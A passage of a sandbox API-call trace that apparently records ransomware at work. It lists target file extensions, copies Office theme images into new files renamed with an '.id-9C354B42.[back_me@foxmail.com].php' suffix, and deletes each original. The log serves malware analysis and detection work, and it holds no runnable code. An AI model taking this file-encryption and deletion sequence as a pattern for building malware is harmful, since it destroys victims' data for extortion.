[0048.018] lstrlenW (lpString=".docx") returned 5 [0048.018] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.018] lstrlenW (lpString=".pdf") returned 4 [0048.018] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.018] lstrlenW (lpString=".xls") returned 4 [0048.018] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.018] lstrlenW (lpString=".xlsx") returned 5 [0048.018] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.018] lstrlenW (lpString=".ppt") returned 4 [0048.018] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.018] lstrlenW (lpString=".zip") returned 4 [0048.018] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.018] lstrlenW (lpString=".rar") returned 4 [0048.018] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.018] lstrlenW (lpString=".bz2") returned 4 [0048.019] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.019] lstrlenW (lpString=".7z") returned 3 [0048.019] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString=".dbf") returned 4 [0048.019] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString=".1cd") returned 4 [0048.019] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString=".jpg") returned 4 [0048.019] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString=".doc") returned 4 [0048.019] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.019] lstrlenW (lpString=".docx") returned 5 [0048.019] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.019] lstrlenW (lpString=".pdf") returned 4 [0048.019] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString=".xls") returned 4 [0048.019] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString=".xlsx") returned 5 [0048.019] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.019] lstrlenW (lpString=".ppt") returned 4 [0048.019] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.019] lstrlenW (lpString=".zip") returned 4 [0048.019] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString=".rar") returned 4 [0048.019] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.019] lstrlenW (lpString=".bz2") returned 4 [0048.020] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.020] lstrlenW (lpString=".7z") returned 3 [0048.020] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.020] lstrlenW (lpString=".dbf") returned 4 [0048.020] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.020] lstrlenW (lpString=".1cd") returned 4 [0048.020] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.020] lstrlenW (lpString=".jpg") returned 4 [0048.020] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.020] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.020] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.057] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1666) returned 1 [0048.057] CloseHandle (hObject=0x200) returned 1 [0048.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 0x20 [0048.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.057] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.057] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.386] GetLastError () returned 0x0 [0048.386] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x682, lpOverlapped=0x0) returned 1 [0048.387] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x690, lpOverlapped=0x0) returned 1 [0048.388] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.388] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.388] SetEndOfFile (hFile=0x218) returned 1 [0048.388] CloseHandle (hObject=0x218) returned 1 [0048.388] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.388] SetEndOfFile (hFile=0x200) returned 1 [0048.389] CloseHandle (hObject=0x200) returned 1 [0048.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.389] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.390] lstrlenW (lpString=".doc") returned 4 [0048.390] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.390] lstrlenW (lpString=".docx") returned 5 [0048.390] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.390] lstrlenW (lpString=".pdf") returned 4 [0048.390] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.390] lstrlenW (lpString=".xls") returned 4 [0048.390] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.390] lstrlenW (lpString=".xlsx") returned 5 [0048.390] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.390] lstrlenW (lpString=".ppt") returned 4 [0048.390] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.390] lstrlenW (lpString=".zip") returned 4 [0048.390] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.390] lstrlenW (lpString=".rar") returned 4 [0048.390] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.390] lstrlenW (lpString=".bz2") returned 4 [0048.390] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.390] lstrlenW (lpString=".7z") returned 3 [0048.390] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.390] lstrlenW (lpString=".dbf") returned 4 [0048.390] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.390] lstrlenW (lpString=".1cd") returned 4 [0048.390] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString=".jpg") returned 4 [0048.391] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString=".doc") returned 4 [0048.391] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.391] lstrlenW (lpString=".docx") returned 5 [0048.391] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.391] lstrlenW (lpString=".pdf") returned 4 [0048.391] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString=".xls") returned 4 [0048.391] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString=".xlsx") returned 5 [0048.391] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.391] lstrlenW (lpString=".ppt") returned 4 [0048.391] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString=".zip") returned 4 [0048.391] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString=".rar") returned 4 [0048.391] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.391] lstrlenW (lpString=".bz2") returned 4 [0048.391] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.391] lstrlenW (lpString=".7z") returned 3 [0048.391] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString=".dbf") returned 4 [0048.391] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.391] lstrlenW (lpString=".1cd") returned 4 [0048.391] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0048.392] lstrlenW (lpString=".jpg") returned 4 [0048.392] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.392] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.392] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.392] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.392] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=47962) returned 1 [0048.392] CloseHandle (hObject=0x200) returned 1 [0048.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20 [0048.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.393] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.393] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.395] GetLastError () returned 0x0 [0048.395] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xbb5a, lpOverlapped=0x0) returned 1 [0048.397] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xbb60, lpOverlapped=0x0) returned 1 [0048.399] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.399] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.399] SetEndOfFile (hFile=0x218) returned 1 [0048.399] CloseHandle (hObject=0x218) returned 1 [0048.400] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.400] SetEndOfFile (hFile=0x200) returned 1 [0048.401] CloseHandle (hObject=0x200) returned 1 [0048.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.401] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0048.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.401] lstrlenW (lpString=".doc") returned 4 [0048.401] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.401] lstrlenW (lpString=".docx") returned 5 [0048.401] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.401] lstrlenW (lpString=".pdf") returned 4 [0048.401] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.401] lstrlenW (lpString=".xls") returned 4 [0048.401] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.401] lstrlenW (lpString=".xlsx") returned 5 [0048.401] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.402] lstrlenW (lpString=".ppt") returned 4 [0048.402] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString=".zip") returned 4 [0048.402] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.402] lstrlenW (lpString=".rar") returned 4 [0048.402] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.402] lstrlenW (lpString=".bz2") returned 4 [0048.402] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString=".7z") returned 3 [0048.402] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString=".dbf") returned 4 [0048.402] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString=".1cd") returned 4 [0048.402] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString=".jpg") returned 4 [0048.402] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.402] lstrlenW (lpString=".doc") returned 4 [0048.402] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString=".docx") returned 5 [0048.402] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.402] lstrlenW (lpString=".pdf") returned 4 [0048.402] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.402] lstrlenW (lpString=".xls") returned 4 [0048.402] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.402] lstrlenW (lpString=".xlsx") returned 5 [0048.402] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.403] lstrlenW (lpString=".ppt") returned 4 [0048.403] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.403] lstrlenW (lpString=".zip") returned 4 [0048.403] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.403] lstrlenW (lpString=".rar") returned 4 [0048.403] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.403] lstrlenW (lpString=".bz2") returned 4 [0048.403] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.403] lstrlenW (lpString=".7z") returned 3 [0048.403] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.403] lstrlenW (lpString=".dbf") returned 4 [0048.403] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.403] lstrlenW (lpString=".1cd") returned 4 [0048.403] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.403] lstrlenW (lpString=".jpg") returned 4 [0048.403] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.403] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.403] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.403] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.404] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=3611) returned 1 [0048.404] CloseHandle (hObject=0x200) returned 1 [0048.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 0x20 [0048.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.405] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.405] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.406] GetLastError () returned 0x0 [0048.407] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xe1b, lpOverlapped=0x0) returned 1 [0048.784] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe20, lpOverlapped=0x0) returned 1 [0048.784] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.785] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.785] SetEndOfFile (hFile=0x218) returned 1 [0048.785] CloseHandle (hObject=0x218) returned 1 [0048.785] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.785] SetEndOfFile (hFile=0x200) returned 1 [0048.786] CloseHandle (hObject=0x200) returned 1 [0048.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.786] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 1 [0048.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.786] lstrlenW (lpString=".doc") returned 4 [0048.786] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.786] lstrlenW (lpString=".docx") returned 5 [0048.786] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.786] lstrlenW (lpString=".pdf") returned 4 